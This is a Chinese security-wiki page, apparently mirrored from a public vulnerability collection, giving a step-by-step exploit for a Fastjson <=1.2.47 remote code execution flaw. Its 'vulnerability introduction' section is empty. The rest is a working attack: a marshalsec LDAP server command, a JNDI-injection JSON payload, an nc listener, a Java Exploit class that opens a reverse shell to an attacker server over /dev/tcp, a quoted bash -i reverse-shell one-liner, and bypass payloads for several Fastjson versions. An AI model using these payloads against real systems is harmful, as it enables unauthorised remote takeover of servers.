menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Fastjson chevron_right Fastjson _=1.2.47 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Fastjson _=1.2.47 远程代码执行漏洞.md
    2.95 KB / 2021-04-21 09:23:46
        Fastjson \<=1.2.47 远程代码执行漏洞
    ===================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    Fastjson \< 1.2.47
    
    三、复现过程
    ------------
    
    **https://github.com/ianxtianxt/fastjson-1.2.47-RCE-1**
    
    -   执行:
    
    ```{=html}
    <!-- -->
    ```
        java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IPvps/#Exploit
    
    1.png
    
    -   修改反弹ip和端口:
    
    ```{=html}
    <!-- -->
    ```
        vim Exploit.java
    
    -   编译生成class://`需要使用jdk1.8,否则会报错`
    
    ```{=html}
    <!-- -->
    ```
        javac Exploit.java
    
    -   开启http服务:
    
    ```{=html}
    <!-- -->
    ```
        python3 -m http.server 80 或者 python -m SimpleHTTPServer 80
    
    -   payload:
    
    ```{=html}
    <!-- -->
    ```
        {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}
    
    -   开启nc监听反弹:
    
    ```{=html}
    <!-- -->
    ```
        nc -lvvp 8888
    
    ### 反弹shell poc补充
    
    #### **java反弹shell,无法直接使用bash -i \>& /dev/tcp/攻击服务器ip/8888 0\>&1**
    
        import java.io.BufferedReader;
        import java.io.InputStream;
        import java.io.InputStreamReader;
    
        public class Exploit{
            public Exploit() throws Exception {
                Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/攻击服务器ip/888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
                InputStream is = p.getInputStream();
                BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
                String line;
                while((line = reader.readLine()) != null) {
                    System.out.println(line);
                }
    
                p.waitFor();
                is.close();
                reader.close();
                p.destroy();
            }
    
            public static void main(String[] args) throws Exception {
            }
        }
    
    ### 补充
    
    **https://github.com/ianxtianxt/Fastjson-1.2.47-rce**
    
        1.2.24
        {"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}
    
        未知版本(1.2.24-41之间)
        {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
    
        1.2.41
        {"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
    
        1.2.42
        {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};
    
        1.2.43
        {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}
    
        1.2.45
        {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
    
        1.2.47
        {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}
    
    
    links
    file_download